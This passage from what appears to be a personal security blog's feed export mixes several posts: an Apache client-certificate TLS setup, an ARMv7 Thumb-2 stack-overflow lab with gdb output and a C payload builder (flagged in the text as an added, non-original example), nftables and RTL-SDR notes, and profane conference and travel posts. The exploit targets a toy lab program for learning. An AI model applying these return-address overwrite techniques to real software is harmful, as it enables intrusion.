........+++<br />
e is 65537 (0x10001)<br />
Enter pass phrase for client.key:<br />
Verifying - Enter pass phrase for client.key:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Client's CSR:</span><br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl req -new -key client.key -out client.csr</b><br />
.......................................................<br />
..............................................<br />
-----<br />
Country Name (2 letter code) [AU]:CN<br />
State or Province Name (full name) [Some-State]:Shanghai<br />
Locality Name (eg, city) []:Shanghai<br />
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT<br />
Organizational Unit Name (eg, section) []:MOT<br />
Common Name (e.g. server FQDN or YOUR name) []:<span style="color: red;">hardened-shit</span><br />
Email Address []:info@hardened-info.com<br />
<br />
Please enter the following 'extra' attributes<br />
to be sent with your certificate request<br />
A challenge password []:<br />
An optional company name []:<br />
<br />
<span style="color: lime;">Generate client's certificate with the CA certificate's signature</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl ca -in client.csr -out client.crt</b><br />
Using configuration from /usr/lib/ssl/openssl.cnf<br />
Enter pass phrase for ./demoCA/private/cakey.pem:<br />
Check that the request matches the signature<br />
Signature ok<br />
Certificate Details:<br />
Serial Number:<br />
c0:81:0e:bc:52:d0:19:5c<br />
Validity<br />
Not Before: Nov 19 02:28:13 2013 GMT<br />
Not After : Nov 19 02:28:13 2014 GMT<br />
Subject:<br />
countryName = CN<br />
stateOrProvinceName = Shanghai<br />
organizationName = MOT<br />
organizationalUnitName = MOT<br />
commonName = hardened-shit<br />
emailAddress = info@hardened-info.com<br />
X509v3 extensions:<br />
X509v3 Basic Constraints: <br />
CA:FALSE<br />
Netscape Comment: <br />
OpenSSL Generated Certificate<br />
X509v3 Subject Key Identifier: <br />
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66<br />
X509v3 Authority Key Identifier: <br />
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63<br />
<br />
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)<br />
Sign the certificate? [y/n]:y<br />
<br />
<br />
1 out of 1 certificate requests certified, commit? [y/n]y<br />
Write out database with 1 new entries<br />
Data Base Updated<br />
--------------------------------------------------------------------------------<br />
<br />
<br />
<span style="color: lime;">Convert to pkcs12 format, which can be identified by firefox</span>:<br />
--------------------------------------------------------------------------------<br />
root@d6-test:/opt/ssl# <b>openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx</b><br />
Enter pass phrase for client.key:<br />
Enter Export Password:<br />
Verifying - Enter Export Password:<br />
--------------------------------------------------------------------------------<br />
<br />
<span style="color: lime;">Enable SSL/TLS support in Apache2</span>:<br />
--------------------------------------------------------------------------------<br />
root@hardened-shit:/opt#<b> mv ssl /etc/ssl/hardened-shit</b><br />
<br />
root@hardened-shit:/etc/apache2# <b>a2ensite default-ssl</b><br />
Enabling site default-ssl.<br />
To activate the new configuration, you need to run:<br />
service apache2 reload<br />
root@hardened-shit:/etc/apache2#<b> a2enmod ssl</b><br />
Module ssl already enabled<br />
<br />
edit /etc/apache2/sites-enabled/default-ssl:<br />
<b> SSLCertificateFile /etc/ssl/hardened-shit/server.crt<br /> SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key<br /><br /> SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt<br /><br /> SSLCACertificatePath /etc/ssl/hardened-shit/<br /> SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt<br /><br /> SSLVerifyClient require<br /> SSLVerifyDepth 10</b><br />
Disable port 80: <br />
root@hardened-shit:/etc/apache2# <b>a2dissite default</b><br />
--------------------------------------------------------------------------------<br />
<br />
Done....it should work.<br />
<br />
btw: I highly recommend you to read these two articles if you want to know further: <a href="https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/" target="_blank">Hardening Your Web Server's SSL Ciphers</a>, and <a href="http://ggramaize.wordpress.com/2013/08/02/tls-perfect-forward-secrecy-support-with-apache/" target="_blank">TLS Perfect Forward Secrecy support with Apache</a><br />
<br />
I only enable the secure ciphers:<br />
<b>SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5<br />SSLProtocol +TLSv1.2 +TLSv1.1</b>Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com4tag:blogger.com,1999:blog-35345954.post-84452290468209000012013-11-21T01:25:00.000+08:002013-11-21T01:25:01.477+08:00Hello, stack bufferoverflow on Debian ARMv7I haven't made my hands *dirty* for a long time since I stopped at io-wargame lvl11. As we all know, ARM architectures are becoming sec guys' daily bread. I think it's time to begin my journey to explore the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this <a href="https://gist.github.com/bdsatish/7476239" target="_blank">great article</a> to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to configure a <a href="https://felipec.wordpress.com/2009/12/27/setting-up-qemu-with-a-nat/" target="_blank">NAT network between host and qemu guest</a>. Or just use my <a href="https://github.com/citypw/arsenal-4-sec-testing/tree/master/others/qemu_nat" target="_blank">network config</a>.<br />
<br />
Figuring out the memory layout is a good starting point. Take a glance at <a href="https://github.com/citypw/citypw-SCFE/blob/master/security/ARM/overwrite_ret_addr_armv7/victim.c" target="_blank">the code</a> at 1st, plz.....<br />
<br />
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q<br />
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.<br />
(gdb) disassemble main<br />
Dump of assembler code for function main:<br />
 0x00008448 &lt;+0&gt;: push {r7, lr}<br />
 0x0000844a &lt;+2&gt;: sub sp, #8<br />
 0x0000844c &lt;+4&gt;: add r7, sp, #0<br />
 0x0000844e &lt;+6&gt;: str r0, [r7, #4]<br />
 0x00008450 &lt;+8&gt;: str r1, [r7, #0]<br />
 0x00008452 &lt;+10&gt;: movw r3, #34040 ; 0x84f8<br />
 0x00008456 &lt;+14&gt;: movt r3, #0<br />
 0x0000845a &lt;+18&gt;: mov r0, r3<br />
 0x0000845c &lt;+20&gt;: movw r1, #33797 ; 0x8405<br />
 0x00008460 &lt;+24&gt;: movt r1, #0<br />
 0x00008464 &lt;+28&gt;: movw r2, #33845 ; 0x8435<br />
 0x00008468 &lt;+32&gt;: movt r2, #0<br />
 0x0000846c &lt;+36&gt;: blx 0x8340 &lt;printf&gt;<br />
 0x00008470 &lt;+40&gt;: ldr r3, [r7, #0]<br />
 0x00008472 &lt;+42&gt;: add.w r3, r3, #4<br />
 0x00008476 &lt;+46&gt;: ldr r3, [r3, #0]<br />
 0x00008478 &lt;+48&gt;: mov r0, r3<br />
 0x0000847a &lt;+50&gt;: bl 0x8404 &lt;test&gt;<br />
 <span style="color: red;">0x0000847e</span> &lt;+54&gt;: mov.w r3, #0 ==&gt; <span style="color: lime;">0x0000847e should be the return address of test()</span><br />
 0x00008482 &lt;+58&gt;: mov r0, r3<br />
 0x00008484 &lt;+60&gt;: add.w r7, r7, #8<br />
 0x00008488 &lt;+64&gt;: mov sp, r7<br />
 0x0000848a &lt;+66&gt;: pop {r7, pc}<br />
End of assembler dump.<br />
(gdb) disassemble fuck_me<br />
Dump of assembler code for function fuck_me:<br />
 <span style="color: red;">0x00008434</span> &lt;+0&gt;: push {r7, lr} ===&gt; <span style="color: lime;">Use 0x00008434 to overwrite test()'s ret addr</span><br />
 0x00008436 &lt;+2&gt;: add r7, sp, #0<br />
 0x00008438 &lt;+4&gt;: movw r0, #34024 ; 0x84e8<br />
 0x0000843c &lt;+8&gt;: movt r0, #0<br />
 0x00008440 &lt;+12&gt;: blx 0x8358 &lt;puts&gt;<br />
 0x00008444 &lt;+16&gt;: pop {r7, pc}<br />
End of assembler dump.<br />
<br />
<span style="color: lime;">Let's check the memory layout:</span><br />
<br />
(gdb) b test<br />
Breakpoint 1 at 0x840c: file victim.c, line 11.<br />
(gdb) r AAAABBBB<br />
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB<br />
The address of func test(): 0x8405, func fuck_me(): 0x8435<br />
<br />
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11<br />
11 strcpy(buf, input);<br />
(gdb) n<br />
12 printf("%s \n", buf);<br />
(gdb) <br />
AAAABBBB <br />
13 }<br />
(gdb) x/12x $sp<br />
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141<br />
0x7efff668: 0x42424242 0x00008400 0x7efff678 <span style="color: red;">0x0000847f</span> ==&gt; ret addr of test()<br />
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb<br />
<br />
So the layout is like this (the stack grows downward, so an overflow of buf runs upward through the saved r7 into the saved LR at 0x7efff674):<br />
[low addr]...[<span style="color: lime;">buf</span> + saved r7: 16 bytes][<span style="color: red;">saved LR = return addr</span>]...[high addr]<br />
<br />
Why did the 0x0000847e we saw in the disassembly become 0x0000847f on the stack? Because this binary is Thumb-2 code (note the 2-byte instructions and the .w suffixes), and on ARM bit 0 of a branch-and-link or interworking target encodes the instruction set: 1 means Thumb, 0 means ARM. bl stores the return address in LR with bit 0 set, and pop {r7, pc} honours that bit when it reloads pc. The program's own printf shows the same thing: the function pointers are printed as 0x8405 and 0x8435, one higher than the symbol addresses 0x8404 and 0x8434. So the return address we write must also carry the Thumb bit, otherwise the CPU switches to ARM state and decodes fuck_me()'s Thumb instructions as ARM ones.<br />
<br />
OK, let's try our 1st exp anyway, with the raw symbol address:<br />
(gdb) r `python -c 'print "A" * 16 + "<span style="color: lime;">\x34\x84</span>"'`<br />
The program being debugged has been started already.<br />
Start it from the beginning? (y or n) y<br />
<br />
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`<br />
The address of func test(): 0x8405, func fuck_me(): <span style="color: red;"><b>0x8435</b></span><br />
Breakpoint 1, test (input=0x7efff90f 'A' &lt;repeats 16 times&gt;, "4\204") at victim.c:11<br />
11 strcpy(buf, input);<br />
(gdb) c<br />
Continuing.<br />
AAAAAAAAAAAAAAAA4� <br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
fuck_me () at victim.c:17<br />
17 printf("being hacked\n");<br />
(gdb) n<br />
<br />
Program terminated with signal SIGILL, Illegal instruction.<br />
The program no longer exists.<br />
<br />
Did you see this? SIGILL inside fuck_me(): we landed there, but in ARM state. Add 1 to fuck_me()'s address to keep the Thumb bit set, plz.....<br />
<br />
(gdb) r `python -c 'print "A" * 16 + "<span style="color: red;">\x35\x84</span>"'`<br />
The program being debugged has been started already.<br />
Start it from the beginning? (y or n) y<br />
<br />
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`<br />
The address of func test(): 0x8405, func fuck_me(): 0x8435<br />
<br />
Breakpoint 1, test (input=0x7efff90f 'A' &lt;repeats 16 times&gt;, "5\204") at victim.c:11<br />
11 strcpy(buf, input);<br />
(gdb) c<br />
Continuing.<br />
AAAAAAAAAAAAAAAA5� <br />
being hacked<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x00008432 in test (input=&lt;error reading variable: Cannot access memory at address 0x4141415d&gt;) at victim.c:13<br />
13 }<br />
<br />
It worked! The SIGSEGV after "being hacked" is just fuck_me() returning through the stale LR into test() at 0x8432 with r7 now 0x41414141 from our filler (hence the 0x4141415d), which doesn't matter here. So the exp should be like:<br />
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`<br />
The address of func test(): 0x8405, func fuck_me(): 0x8435<br />
AAAAAAAAAAAAAAAA5� <br />
being hacked<br />
Segmentation fault<br />
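To make the Thumb-bit rule and the strcpy() limitation concrete, here is an added example of mine; it is not code from the original post or the citypw-SCFE repo, and it only builds bytes, so it runs on any host. It assumes what the gdb session showed: 16 bytes of filler from the start of buf to the saved LR of test() (the saved r7 sits in between), fuck_me() at 0x8434 as Thumb code, an original saved LR of 0x847f, and strcpy() as the copy primitive, so the payload is cut at its first NUL byte. The simulate step shows why the two-byte "\x35\x84" works here (the NUL that strcpy() writes and the untouched high byte are both zero anyway) and why a target with a NUL in a low byte would silently land somewhere else.

```c
/* Added example: payload builder for the ARMv7 Thumb-2 victim above.
 * Not part of the original post or the citypw-SCFE repo. Assumed from the
 * gdb session: 16 bytes separate the start of buf from the saved LR of
 * test() (the saved r7 sits in between), fuck_me() starts at 0x8434 and is
 * Thumb code, the original saved LR is 0x847f, and strcpy() delivers the
 * bytes, so nothing after the first NUL byte reaches the stack. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAD_LEN      16      /* bytes from buf to the saved LR (gdb: x/12x $sp) */
#define FUCK_ME_ADDR 0x8434u /* from "disassemble fuck_me" */
#define SAVED_LR     0x847fu /* value seen in the saved LR slot */
#define PAYLOAD_MAX  (PAD_LEN + 4)

/* ARM interworking: bit 0 of the value loaded into pc selects Thumb (1) or
 * ARM (0) state. fuck_me() is Thumb code, so it must be entered via 0x8435,
 * just like the compiler's own function pointers (0x8405, 0x8435). */
static inline uint32_t thumb_target(uint32_t addr)
{
    return addr | 1u;
}

/* Fill `out` with PAD_LEN filler bytes followed by the little-endian return
 * address. Returns the number of bytes strcpy() will really copy, i.e. the
 * payload length up to (not including) the first NUL byte. */
size_t build_payload(uint32_t ret_addr, int thumb, uint8_t out[PAYLOAD_MAX])
{
    uint32_t target = thumb ? thumb_target(ret_addr) : ret_addr;
    memset(out, 'A', PAD_LEN);
    for (int i = 0; i < 4; i++)
        out[PAD_LEN + i] = (uint8_t)(target >> (8 * i));
    size_t n = 0;
    while (n < PAYLOAD_MAX && out[n] != 0)
        n++;
    return n;
}

/* Simulate what the saved-LR slot holds after strcpy(buf, payload): bytes
 * up to the first NUL are copied, the NUL itself is written too, and any
 * byte beyond that keeps its old value. */
uint32_t simulate_overwrite(const uint8_t *payload, size_t copied, uint32_t saved_lr)
{
    uint8_t slot[4];
    for (int i = 0; i < 4; i++)
        slot[i] = (uint8_t)(saved_lr >> (8 * i));
    for (size_t i = PAD_LEN; i <= copied && i < PAYLOAD_MAX; i++)
        slot[i - PAD_LEN] = (i < copied) ? payload[i] : 0;
    return (uint32_t)slot[0] | (uint32_t)slot[1] << 8 |
           (uint32_t)slot[2] << 16 | (uint32_t)slot[3] << 24;
}

/* Address test() will actually return to for a given target. 0x8434 with
 * the Thumb bit gives 0x8435 here; a target with a NUL in a low byte
 * (e.g. 0x00840034) is cut short and the jump goes elsewhere. */
uint32_t check_payload(uint32_t ret_addr, int thumb, uint32_t saved_lr)
{
    uint8_t tmp[PAYLOAD_MAX];
    size_t n = build_payload(ret_addr, thumb, tmp);
    return simulate_overwrite(tmp, n, saved_lr);
}

/* Number of bytes strcpy() would copy for this target. */
size_t payload_len(uint32_t ret_addr, int thumb)
{
    uint8_t tmp[PAYLOAD_MAX];
    return build_payload(ret_addr, thumb, tmp);
}

/* Emit the raw bytes so the victim can be run as: ./victim "$(./payload)" */
int main(void)
{
    uint8_t p[PAYLOAD_MAX];
    size_t n = build_payload(FUCK_ME_ADDR, 1, p);
    fprintf(stderr, "target 0x%08x, %zu bytes copied, test() returns to 0x%08x\n",
            thumb_target(FUCK_ME_ADDR), n, simulate_overwrite(p, n, SAVED_LR));
    fwrite(p, 1, n, stdout);
    return 0;
}
```

Build it with gcc -o payload payload.c and run the victim as ./victim "$(./payload)"; the summary of where test() will return goes to stderr, the payload bytes to stdout.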
===========================<br />
<br />
I guess exploitation on ARM is quite different from x86. I've heard that ret2libc won't work on ARM. That's really interesting and worth figuring out. Obviously, this <a href="http://www.phrack.org/issues.html?issue=66&id=12&mode=txt" target="_blank">Phrack paper</a> and some manuals should be added to my must-read list.<br /><br />tag:blogger.com,1999:blog-35345954.post-40846962954625152202013-10-23T17:26:00.002+08:002013-10-23T17:29:08.290+08:00 Say "hello nftables" on Debian 7 GNU/Linux<br />Nftables is the <a href="http://lwn.net/Articles/324989/" target="_blank">4th generation packet filter engine for the Linux kernel</a> and it will be merged into kernel 3.13. I haven't played with netfilter for a while. When I saw nftables a couple of days ago, I felt there was an itch I needed to scratch;-) Let's try to say "Hi" to nftables.<br />
<br />
OS: Debian 7 GNU/Linux. Grab the small (netinst) ISO <a href="http://cdimage.debian.org/debian-cd/7.2.0/i386/iso-cd/debian-7.2.0-i386-netinst.iso" target="_blank">here</a>.<br />
<br />
After the installation, some extra packages need to be installed as well:<br />
#apt-get install git vim libgmp-dev libreadline-dev libtool autoconf gcc make pkg-config libjansson-dev libmxml-dev flex bison libncurses5-dev kernel-package<br />
<br />
First, you need to build and install two libraries, libmnl and libnftables (the latter was later renamed libnftnl):<br />
git clone git://git.netfilter.org/libmnl<br />
cd libmnl/<br />
./autogen.sh<br />
./configure<br />
make<br />
sudo make install<br />
sudo ldconfig<br />
<br />
git clone git://git.netfilter.org/libnftables<br />
cd libnftables/<br />
./autogen.sh<br />
./configure --with-json-parsing --with-xml-parsing<br />
make<br />
sudo make install<br />
sudo ldconfig<br />
<br />
Then, compile/install the userspace tool( nft):<br />
<br />
git clone git://git.netfilter.org/nftables<br />
cd nftables<br />
./autogen.sh<br />
ac_cv_func_malloc_0_nonnull=yes ac_cv_func_realloc_0_nonnull=yes ./configure<br />
make<br />
sudo make install<br />
sudo ldconfig<br />
<br />
Because linux-3.13 hasn't been released yet, we need to grab the kernel source from the nftables dev tree:<br />
<br />
git clone git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nftables.git linux<br />
cp /boot/config-3.2.0-4-686-pae .config<br />
make menuconfig (enable the NF_TABLES options in the Netfilter section: Networking support -&gt; Networking options -&gt; Network packet filtering framework)<br />
make -j 3 deb-pkg<br />
cd ../<br />
sudo dpkg -i *.deb<br />
<br />
Reboot your machine. Let's try some <a href="https://github.com/citypw/arsenal-4-sec-testing/blob/master/bt5_firewall/nft_fw" target="_blank">policies</a>. Thanks to whoever wrote this <a href="https://home.regit.org/netfilter-en/nftables-quick-howto/" target="_blank">HOWTO</a>. Nftables policy seems easy to write, but I'm still not used to the new style, since I don't even know how to delete a table: it always says the device is BUSY or something like that. WTH~ I checked the commits; it should be a feature though. I think a policy converter tool between iptables and nftables is necessary. Otherwise it'd be a barrier to old-school iptables users/admins/developers.<br /><br />tag:blogger.com,1999:blog-35345954.post-82520279805841872162013-10-17T13:49:00.000+08:002013-10-17T13:49:05.606+08:00 RTL-SDR version of "Hello World"<br />Telco security has always been a fascinating field I wanted to get involved in. Why? Because those old-school Phrack guys were playing with both computer sec and telco sec. I missed the golden age of Phrack, and that bothered me for a while. It won't stop me from diving into any field I want now. If what makes you tick is only profit (money?), come on, you're probably not qualified to mention the term "<a href="http://phrack.org/issues.html?issue=64&id=4&mode=txt" target="_blank">underground spirit</a>";-)<br />
<br />
About a month ago, a friend (can't list his/her name here-_-) sent me a <a href="https://www.defcon.org/images/defcon-21/dc-21-presentations/DePerry-Ritter/DEFCON-21-DePerry-Ritter-Femtocell-Updated.pdf" target="_blank">slide deck</a> about femtocell hacking and asked if I might be interested in it. Of course I am. But...well, there's always a fucking "but", isn't there?...a femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker (can't list his/her name either-_-) mentioned that there are cheap devices I could buy to learn telco stuff: RTL-SDR. Everything you need to know is already on this <a href="http://www.rtl-sdr.com/" target="_blank">website</a>. I bought a tuner, antenna, frequency counter, SMA-to-MCX adapter, etc... then I was catching the shit in the air. FM at first, then Mode-S transmissions and GSM sniffing. What I have learned/done in the past two weeks really shook my mind and definitely activated a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and the kernel is already a burden that's hard to carry. Hope I can make it this time.............I really appreciate those who were/are contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.<br />
<br />
Frequency counter; it could probably detect an IR-based controller too<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggY4y440cB6krMUb9t_nLz4LbtT-zyaHF8LlPyXzF2RBljASBYJhpa-A-QifkrMNfQD_61Kgv9_mt4qECUbGd3sfi1GdVWuAgnvFX4PZafvpC0jtHkKBE0j1SCvkixOrBBA73-0A/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggY4y440cB6krMUb9t_nLz4LbtT-zyaHF8LlPyXzF2RBljASBYJhpa-A-QifkrMNfQD_61Kgv9_mt4qECUbGd3sfi1GdVWuAgnvFX4PZafvpC0jtHkKBE0j1SCvkixOrBBA73-0A/s640/1.JPG" width="640" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
Catching the shit in the air (not on the wire) </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZ30XUA47WONhptE4yGlFslSzR_EmJ89EfSikDKDt0BgbWc7X-XRTvhIafQ-i_c9pBDnhFLLZeGHlwjVAEkUIEevk6CGwmafTJ8PWpbfHUijxlPfr6DmE0QhOhxQZzlyG-XVqmQ/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLZ30XUA47WONhptE4yGlFslSzR_EmJ89EfSikDKDt0BgbWc7X-XRTvhIafQ-i_c9pBDnhFLLZeGHlwjVAEkUIEevk6CGwmafTJ8PWpbfHUijxlPfr6DmE0QhOhxQZzlyG-XVqmQ/s640/2.JPG" width="640" /></a></div>
Support EFF....<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oLEzKogfotfVG9FH2cNR_qVUt3g4d3EQclRGDg0UZfap_0RwJnPUvllPx0Ba3ouiaCmZb-mGOsHB6_lbcygh36NUH90u1MIBN2LKWysrQFbjdsTcfd22oVSUsnXDjWFfxNriRQ/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oLEzKogfotfVG9FH2cNR_qVUt3g4d3EQclRGDg0UZfap_0RwJnPUvllPx0Ba3ouiaCmZb-mGOsHB6_lbcygh36NUH90u1MIBN2LKWysrQFbjdsTcfd22oVSUsnXDjWFfxNriRQ/s640/3.JPG" width="640" /></a></div>
<br />tag:blogger.com,1999:blog-35345954.post-19565301872832945782013-09-28T10:20:00.000+08:002013-09-28T10:23:38.975+08:00 Syscan Beijing 2013 slides<br />I've been to 5 conferences (KCONv2, XCON2013, ISC2013, OWASP Beijing 2013, Syscan Beijing 2013) in the past months. The first four confs sucked, but <a href="http://syscan360.org/html/2013/en/index.html" target="_blank">Syscan</a> brought us very high quality. Don't get me wrong: some people think those 4 conferences are good, because they are websec guys or Windows guys. As a GNU/Linux sec guy, those conferences were drugging me to sleep;-) So I'll only bullshit a little bit about Syscan here. Stefan Esser's presentation "Tales from iOS 6 Exploitation" shocked us;-) A lot of people knew about the many technical elements in the exploitation process and how difficult each one of them is to deal with, but Stefan did them all at once. That's fuc*ing super awesome. NGUYEN Anh Quynh's presentation was about ROP gadgets. I don't know much about this field; I only used some open source ROP gadget finders once or twice. Anyway, Nguyen's talk also blew my mind on the first day of the conference, because his approach combines an LLVM compiler-based technique (dude, you are using formal logic to deal with sec shit! Fuc*ing awesome). Plz take a look at his slides. There were other great presentations. I'll leave the slide download link at the end.<br />
<br />
Another funny story happened near the end of Jonathan's presentation. A guy asked him about FE. He just told us FE is nothing but a good advertising company. The real heroes are the grsecurity guys: they invented the concept of ASLR, and more....btw, take a look at how grsec deals with the stack canary in the hardened kernel;-)<br />
<br />
I've packed all slides into one <a href="http://hfg-resources.googlecode.com/files/syscan-bj-2013.tar.bz2" target="_blank">tar.bz2 file</a>.<br />
<br />
Can you fucking imagine that the conference organizers (I won't name you motherfuckers) brought these girls (sexy? I don't think so) there? I don't care about girls at a conference. As our type of guys, we'd go out to the club/bar after the conference. Unfortunately, I'm already married, which means the "fuck around" part doesn't belong to me;-) <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7ufje0JyKSdxnoQ2k6ZnDr8TMUgG4caAc3HYoCzYYcK_ZfYljZkOFGhJ97cjK60bsWk1DDwS7UrZ4wCEj_qSUkaEA4Hj7Ikom8N2latcV6YBExpxAAKj2ejzqAN2H2uW9QUOmvA/s1600/20130923_115706.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7ufje0JyKSdxnoQ2k6ZnDr8TMUgG4caAc3HYoCzYYcK_ZfYljZkOFGhJ97cjK60bsWk1DDwS7UrZ4wCEj_qSUkaEA4Hj7Ikom8N2latcV6YBExpxAAKj2ejzqAN2H2uW9QUOmvA/s640/20130923_115706.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0BUnAS5TG9wfEvC-P5kodJ8MYTU-KOvgv095YglkBTo5Yd0ajIc6p6y_7hd9Bhg8GY26pc4pWncczA__xGNpD3qoWCRf7WIT7stJjdDeXpsQwNkJpAok6Uda6tDbQ7qsozevD0Q/s1600/20130923_143802.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0BUnAS5TG9wfEvC-P5kodJ8MYTU-KOvgv095YglkBTo5Yd0ajIc6p6y_7hd9Bhg8GY26pc4pWncczA__xGNpD3qoWCRf7WIT7stJjdDeXpsQwNkJpAok6Uda6tDbQ7qsozevD0Q/s640/20130923_143802.jpg" width="640" /></a></div>
<br />tag:blogger.com,1999:blog-35345954.post-75213814064865362282013-07-28T02:11:00.000+08:002013-07-28T02:11:20.470+08:00 Trip to Thessaloniki for osc 2013<br />As many people mentioned, <a href="https://conference.opensuse.org/osem/conference/osc2013/schedule" target="_blank">openSUSE conference 2013</a> was held from July 18 to July 22 in <a href="http://en.wikipedia.org/wiki/Thessaloniki" target="_blank">Thessaloniki</a>, Greece. After 20 hrs in the air and waiting in airports (for transfers), I arrived in Thessaloniki at about 3:00 PM on July 17. Then I went to the seaside by bus No. 78. It was a really nice view there. Then I took a taxi to the hotel for another 12 hrs of sleep;-) I visited the White Tower and Aristotle Square. The great philosopher Aristotle was born in a place near the city of Thessaloniki. I thought Aristotle had visited the city, but I haven't found the related information yet.<br />
<br />
It was really nice to be there. Local people are so relaxed, much more relaxed than I feel in Beijing. I love this place, I do. I met many interesting guys here, including security guys and non-security guys. The people I met in Thessaloniki all love beer/sec/gaming/System of a Down/Rammstein/Nirvana/etc....even the background music in the main conference room was Nirvana songs. Man, can you believe it? I never saw that happen in China. Those guys are really awesome. I also met some sec guys there. They are very skilled and talented dudes. I think I learned quite a lot from them in a few days.<br />
<br />
This trip made me feel like I'd found my way back home. Most people in BJ don't like what I like. I think the whole fucking society just can't accept the type of person I am. I don't wanna change.<br />
<br />
------------------------------------------------------------------------- <br />
- I love punk rock and metal, am I wrong?<br />
- I love Philosophy/Theology/History, am I fucking wrong?<br />
- I love triple-A computer/video games, am I fucking wrong?<br />
- I don't care how much money I earn (I can still feed my family, you piece of shit-_-), am I wrong? <br />
- I hate the type of guys in suits who are just dead inside (walking dead) with their fucking boring day jobs, am I fucking wrong?<br />
------------------------------------------------------------------------<br />
<br />
I don't think I'm a weirdo. But most Chinese people I met in BJ think that way. Don't get me wrong...I have some very awesome friends. They are Chinese dudes/ladies. But we are a minority....Green Day is always supporting us: "I wanna be the minority... I don't need your authority...Down with the moral majority"...aha, I really love this song;-)<br />
<br />
btw: The food in Thessaloniki is really awesome, especially the seafood. And I, as a newbie, gave a presentation "<a href="https://github.com/citypw/citypw-SCFE/raw/master/security/slides/osc2013_hardening.pdf" target="_blank">Introduction to GNU/Linux hardening</a>" at osc 2013.<br />
<br />
Nice view, huh?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKmRuzg8w35lJb2um_rxhMgkwUN3rBNRy8MM_I3PjVwMCKZg4bFBjsuddPtZJuzGawSZbdY6AZFvHgH-l57kdaK4HY12dShFdOmhBfKab3CSSWIgqH_aCOHadUUNHjEn8xx9Ptsw/s1600/20130717_211517.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKmRuzg8w35lJb2um_rxhMgkwUN3rBNRy8MM_I3PjVwMCKZg4bFBjsuddPtZJuzGawSZbdY6AZFvHgH-l57kdaK4HY12dShFdOmhBfKab3CSSWIgqH_aCOHadUUNHjEn8xx9Ptsw/s640/20130717_211517.jpg" width="640" /></a></div>
<br />
Good old port <br />
<div class="separator" style="clear: both; text-align: center;">
